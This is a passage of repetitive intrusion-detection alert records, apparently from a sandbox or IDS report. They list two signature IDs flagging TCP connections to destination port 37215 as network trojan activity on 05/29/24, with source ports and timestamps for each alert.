                SID:2835222
                Source Port:60622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035123
                SID:2829579
                Source Port:51208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781871
                SID:2835222
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290347
                SID:2835222
                Source Port:35278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364437
                SID:2829579
                Source Port:45402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.658379
                SID:2835222
                Source Port:36756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873368
                SID:2835222
                Source Port:38788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978170
                SID:2829579
                Source Port:52668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665477
                SID:2829579
                Source Port:34914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175054
                SID:2829579
                Source Port:37538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207528
                SID:2835222
                Source Port:42272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717324
                SID:2829579
                Source Port:60174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.733546
                SID:2829579
                Source Port:39890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505152
                SID:2835222
                Source Port:46952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913784
                SID:2835222
                Source Port:60860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968479
                SID:2829579
                Source Port:40830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776768
                SID:2835222
                Source Port:48662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264523
                SID:2835222
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445923
                SID:2829579
                Source Port:44268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916821
                SID:2829579
                Source Port:53130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282422
                SID:2829579
                Source Port:47306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281426
                SID:2835222
                Source Port:36576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783344
                SID:2835222
                Source Port:34348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662167
                SID:2829579
                Source Port:55888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286556
                SID:2835222
                Source Port:50544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.657092
                SID:2829579
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583865
                SID:2829579
                Source Port:36748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321370
                SID:2835222
                Source Port:37330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500494
                SID:2835222
                Source Port:33710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.568979
                SID:2829579
                Source Port:34606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271697
                SID:2829579
                Source Port:50922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417185
                SID:2829579
                Source Port:56076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166529
                SID:2835222
                Source Port:54894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.065312
                SID:2835222
                Source Port:44202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236595
                SID:2835222
                Source Port:52452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908269
                SID:2835222
                Source Port:37142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853229
                SID:2829579
                Source Port:53654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900504
                SID:2835222
                Source Port:40476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586810
                SID:2829579
                Source Port:41524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630758
                SID:2829579
                Source Port:34702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556670
                SID:2829579
                Source Port:54506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276458
                SID:2835222
                Source Port:37330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419714
                SID:2835222
                Source Port:48644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666865
                SID:2835222
                Source Port:55984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948205
                SID:2829579
                Source Port:52114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558128
                SID:2835222
                Source Port:47708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.040651
                SID:2829579
                Source Port:53154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.733675
                SID:2835222
                Source Port:55850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655068
                SID:2835222
                Source Port:38776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161288
                SID:2835222
                Source Port:53238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.745354
                SID:2829579
                Source Port:44278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233244
                SID:2835222
                Source Port:39808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624875
                SID:2835222
                Source Port:40482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654774
                SID:2835222
                Source Port:54754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631581
                SID:2835222
                Source Port:38572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583340
                SID:2829579
                Source Port:48120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787739
                SID:2835222
                Source Port:52394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080968
                SID:2829579
                Source Port:47908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026486
                SID:2835222
                Source Port:33162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362788
                SID:2829579
                Source Port:43406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.568423
                SID:2835222
                Source Port:48434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264284
                SID:2835222
                Source Port:43134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638924
                SID:2835222
                Source Port:46076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910710
                SID:2829579
                Source Port:60936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437836
                SID:2829579
                Source Port:51364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550563
                SID:2829579
                Source Port:53010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222929
                SID:2835222
                Source Port:48424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597616
                SID:2835222
                Source Port:45744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826839
                SID:2829579
                Source Port:58662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507055
                SID:2829579
                Source Port:51490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023582
                SID:2829579
                Source Port:55462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.921289
                SID:2829579
                Source Port:41706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435556
                SID:2829579
                Source Port:33800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265685
                SID:2835222
                Source Port:59448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284315
                SID:2835222
                Source Port:34234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902865
                SID:2835222
                Source Port:45524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715238
                SID:2835222
                Source Port:44382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560082
                SID:2835222
                Source Port:56960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730592
                SID:2835222
                Source Port:33082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928773
                SID:2835222
                Source Port:48398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683812
                SID:2829579
                Source Port:48622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870122
                SID:2835222
                Source Port:36394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785906
                SID:2835222
                Source Port:38970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384339
                SID:2829579
                Source Port:39420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533785
                SID:2835222
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586026
                SID:2835222
                Source Port:38432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507202
                SID:2829579
                Source Port:40128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669587
                SID:2829579
                Source Port:57400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718402
                SID:2829579
                Source Port:56072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839536
                SID:2835222
                Source Port:41152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019872
                SID:2829579
                Source Port:45066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.943028
                SID:2829579
                Source Port:47576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630650
                SID:2829579
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209539
                SID:2829579
                Source Port:58224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659773
                SID:2835222
                Source Port:39706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836452
                SID:2829579
                Source Port:33160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419484
                SID:2829579
                Source Port:50776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712620
                SID:2829579
                Source Port:38548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827161
                SID:2835222
                Source Port:33852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287112
                SID:2829579
                Source Port:49926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576028
                SID:2835222
                Source Port:36284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233812
                SID:2835222
                Source Port:51278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129581
                SID:2835222
                Source Port:38638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967382
                SID:2829579
                Source Port:34008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.011011
                SID:2829579
                Source Port:39074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586621
                SID:2835222
                Source Port:37570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681615
                SID:2829579
                Source Port:47920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555368
                SID:2835222
                Source Port:44284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613125
                SID:2829579
                Source Port:45644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927822
                SID:2829579
                Source Port:60028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848380
                SID:2829579
                Source Port:37478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941367
                SID:2835222
                Source Port:55826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965856
                SID:2835222
                Source Port:37024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843386
                SID:2829579
                Source Port:52010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915114
                SID:2829579
                Source Port:48180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.564734
                SID:2829579
                Source Port:40262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947632
                SID:2829579
                Source Port:55598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519667
                SID:2835222
                Source Port:40160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281662
                SID:2829579
                Source Port:57686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614152
                SID:2835222
                Source Port:36056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711026
                SID:2835222
                Source Port:36092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362832
                SID:2829579
                Source Port:60902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946275
                SID:2835222
                Source Port:46448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909053
                SID:2829579
                Source Port:56170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559038
                SID:2829579
                Source Port:53268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570525
                SID:2835222
                Source Port:41432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902904
                SID:2835222
                Source Port:60994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969642
                SID:2829579
                Source Port:59530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319297
                SID:2829579
                Source Port:41576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631648
                SID:2835222
                Source Port:58156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814600
                SID:2835222
                Source Port:48720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654311
                SID:2835222
                Source Port:58472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435107
                SID:2829579
                Source Port:53488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787333
                SID:2829579
                Source Port:54596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531528
                SID:2835222
                Source Port:35160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743291
                SID:2829579
                Source Port:51442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778585
                SID:2829579
                Source Port:38962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859695
                SID:2835222
                Source Port:45768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802974
                SID:2829579
                Source Port:48292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.034060
                SID:2829579
                Source Port:43348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567118
                SID:2835222
                Source Port:40636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139764
                SID:2829579
                Source Port:42976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771114
                SID:2835222
                Source Port:37348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618839
                SID:2835222
                Source Port:45318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663589
                SID:2835222
                Source Port:39894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612279
                SID:2829579
                Source Port:39348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042041
                SID:2835222
                Source Port:37856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732017
                SID:2835222
                Source Port:34540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899117
                SID:2835222
                Source Port:39158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238862
                SID:2829579
                Source Port:35440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184356
                SID:2829579
                Source Port:57386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210098
                SID:2829579
                Source Port:43688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442641
                SID:2829579
                Source Port:51436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938852
                SID:2835222
                Source Port:53648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663190
                SID:2835222
                Source Port:58980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136926
                SID:2835222
                Source Port:40174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783381
                SID:2829579
                Source Port:35860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640782
                SID:2829579
                Source Port:50002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969944
                SID:2835222
                Source Port:43868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359727
                SID:2829579
                Source Port:49286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419375
                SID:2835222
                Source Port:41804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598269
                SID:2829579
                Source Port:42890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467050
                SID:2835222
                Source Port:36588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434284
                SID:2835222
                Source Port:41750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598232
                SID:2829579
                Source Port:36824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556842
                SID:2835222
                Source Port:54680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611112
                SID:2835222
                Source Port:40702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.578972
                SID:2829579
                Source Port:42454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669576
                SID:2829579
                Source Port:38328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784478
                SID:2829579
                Source Port:57548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511059
                SID:2835222
                Source Port:45794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614787
                SID:2829579
                Source Port:48360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265618
                SID:2829579
                Source Port:43742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.241035
                SID:2835222
                Source Port:45578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502588
                SID:2829579
                Source Port:35944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941900
                SID:2835222
                Source Port:59036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.030417
                SID:2829579
                Source Port:47094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182551
                SID:2835222
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.011059
                SID:2835222
                Source Port:33584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.827873
                SID:2835222
                Source Port:44908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855991
                SID:2829579
                Source Port:50924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931393
                SID:2835222
                Source Port:41852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420214
                SID:2835222
                Source Port:41240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024876
                SID:2835222
                Source Port:46528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653496
                SID:2829579
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819174
                SID:2829579
                Source Port:48572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947220
                SID:2829579
                Source Port:45580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859676
                SID:2829579
                Source Port:33278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532353
                SID:2829579
                Source Port:47082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868281
                SID:2829579
                Source Port:50322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226018
                SID:2835222
                Source Port:48202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703448
                SID:2835222
                Source Port:54460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321401
                SID:2829579
                Source Port:43768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610031
                SID:2835222
                Source Port:54130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163640
                SID:2829579
                Source Port:37330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.617033
                SID:2835222
                Source Port:38648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655128
                SID:2835222
                Source Port:49338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862511
                SID:2835222
                Source Port:60418
                Destination Port:37215
